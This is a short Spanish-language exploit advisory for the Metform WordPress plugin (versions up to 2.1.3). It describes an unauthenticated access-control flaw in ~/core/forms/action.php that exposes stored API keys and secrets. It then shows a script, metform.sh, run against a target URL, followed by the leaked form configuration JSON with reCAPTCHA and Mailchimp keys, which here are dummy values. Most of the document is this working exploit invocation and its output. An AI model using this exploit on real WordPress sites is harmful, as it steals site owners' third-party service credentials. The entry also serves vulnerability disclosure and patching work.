
WordPress Plugin Metform <= 2.1.3 - Control de acceso inadecuado que permite la divulgación no autenticada de información sensible
WordPress Plugin Metform <= 2.1.3 - Control de Acceso Inadecuado que Permite la Divulgación No Autenticada de Información Sensible
Es vulnerable a la divulgación de información sensible debido a un control de acceso inadecuado en el archivo ~/core/forms/action.php, que puede ser explotado por un atacante no autenticado para ver todas las claves API y secretos de APIs de terceros integradas como PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA, etc.
bash metform.sh http://wordpress.lan
{
"form_title": "New Form # 1691056894",
"success_message": "Thank you! Form submitted successfully.",
"capture_user_browser_data": "1",
"store_entries": "1",
"entry_title": "Entry # [mf_id]",
"count_views": "1",
"redirect_to": "",
"user_email_subject": "",
"user_email_from": "",
"user_email_reply_to": "",
"user_email_body": "",
"admin_email_subject": "",
"admin_email_to": "",
"admin_email_from": "",
"admin_email_reply_to": "",
"admin_email_body": "",
"mf_mailchimp_list_id": "",
"mf_slack_webhook": "",
"mf_recaptcha_version": "recaptcha-v2",
"mf_recaptcha_site_key": "sfsdffd",
"mf_recaptcha_secret_key": "sfddsf",
"mf_recaptcha_site_key_v3": "",
"mf_recaptcha_secret_key_v3": "",
"mf_mailchimp_api_key": "asdadasdsaddas",
"input_names": "Example: [mf-inputname]",
"ckit_opt": [],
"aweber_opt": [],
"mp_opt": []
}